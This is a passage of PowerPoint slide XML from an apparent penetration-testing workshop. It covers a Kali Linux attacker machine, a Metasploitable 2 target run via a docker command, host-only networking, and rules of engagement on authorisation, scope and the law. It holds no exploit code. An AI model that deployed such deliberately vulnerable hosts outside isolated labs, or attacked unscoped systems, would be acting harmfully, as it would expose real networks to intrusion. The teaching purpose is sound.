                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Everything today happens between two machines that both live on your laptop. If your lab is not running, the next two sessions will be a movie instead of a workshop.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2468880"/>
            <a:ext cx="5394960" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1944"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 0" descr="img/ic_kalilinux.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2724912"/>
            <a:ext cx="502920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481328" y="2798064"/>
            <a:ext cx="4114800" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Attacker: Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="3429000"/>
            <a:ext cx="4846320" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Any Debian based distro works, Kali just ships the tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>VirtualBox or VMware, 2 GB RAM is enough</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Network adapter set to Host-only</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Check with: ip a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263640" y="2468880"/>
            <a:ext cx="5376672" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1944"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 1" descr="img/ic_docker.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="2724912"/>
            <a:ext cx="502920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7196328" y="2798064"/>
            <a:ext cx="4206240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Target: Metasploitable 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="3429000"/>
            <a:ext cx="4846320" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A Linux box built to be broken, on purpose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Import the VM, or pull the container image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Never expose it to your home network or the internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="4892040"/>
            <a:ext cx="4846320" cy="734314"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7471"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6684264" y="5029200"/>
            <a:ext cx="4553712" cy="459994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ docker run -d --name msf2 \</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>    -p 21,22,80,445 tleemcjr/metasploitable2</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RULES OF ENGAGEMENT</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Authorisation, scope and the law</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03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1463040"/>
            <a:ext cx="11091672" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4516"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2A0F1A"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1664208"/>
            <a:ext cx="10515600" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A port scan is not a harmless ping. In Serbia, unauthorised access to a computer system is a criminal offence under the Criminal Code, and the same is true across the EU under the Directive on attacks against information systems. Nobody cares that you were curious.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3108960"/>
            <a:ext cx="5486400" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Written permission or nothing. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Verbal approval from a friend at the company is not a scope document.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scope is a list of IPs. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If it is not on the list, it is not yours, even if it answers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Time window matters. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scanning production at 09:00 on payday is how you get an incident call.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3108960"/>
            <a:ext cx="5212080" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Public services are not targets. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Your ISP router, the faculty wifi and Google are off limits.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
